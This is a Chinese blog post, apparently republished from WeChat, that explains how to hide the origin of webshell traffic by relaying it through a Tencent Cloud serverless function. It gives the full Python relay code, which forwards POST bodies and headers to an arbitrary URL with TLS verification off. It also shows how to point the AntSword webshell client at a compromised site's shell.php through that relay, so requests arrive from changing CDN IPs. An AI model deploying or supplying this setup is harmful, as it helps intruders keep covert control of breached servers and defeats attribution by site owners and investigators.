防溯源链接webshell
2022-7-22 11:22:28 Author: 白帽兔(查看原文) 阅读量:18 收藏

原理介绍

这个技术的核心原理是利用腾讯云的云函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的)。在国外应该早就玩烂了。

具体步骤

创建函数

使用默认模板即可,然后选择下一步。

到这里也可以全部默认,函数名称和地域可以自己自由发挥,然后点击完成。

然后依次打开函数管理 - 函数代码。

然后把下面代码替换 index.py 的代码,点击部署。

# -*- coding: utf8 -*-import requestsimport jsondef geturl(urlstr):    jurlstr = json.dumps(urlstr)    dict_url = json.loads(jurlstr)    return dict_url['u']def main_handler(event, context):    url = geturl(event['queryString'])    postdata = event['body']    headers=event['headers']    resp=requests.post(url,data=postdata,headers=headers,verify=False)    response={        "isBase64Encoded": False,        "statusCode": 200,        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},        "body": resp.text    }    return response

点击触发管理,就会看到访问路径,复制备用。

开始 Webshell 请求来源隐藏

打开蚁剑,url一栏中填入 访问路径 + webshell地址,列如:

https://service-gcuy2k9u-1257053841.gz.apigw.tencentcs.com/release/APIGWHtmlDemo-1614356287?u=https://www.xxx.com/shell.php

其他设置和正常使用配置即可,看看效果。

所有请求都是利用腾讯云的云函数将我们的请求进行转发,云函数的服务器是自带 CDN 的,所以我们每次去请求的 Webshell IP 都是不同的,这就达到了 Webshell 请求来源隐藏。

注意

在函数管理 - 函数配置里面,最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长。



文章来源: http://mp.weixin.qq.com/s?__biz=MzA4NzUzNzgyMw==&mid=2247485245&idx=1&sn=909e1aec78bc7145e0e71ee99c4afd06&chksm=9036a6cda7412fdb24cc338721bc91fd56f3ec8cc6591010b5e5f82582e07c2041e611022b00#rd
如有侵权请联系:admin#unsafe.sh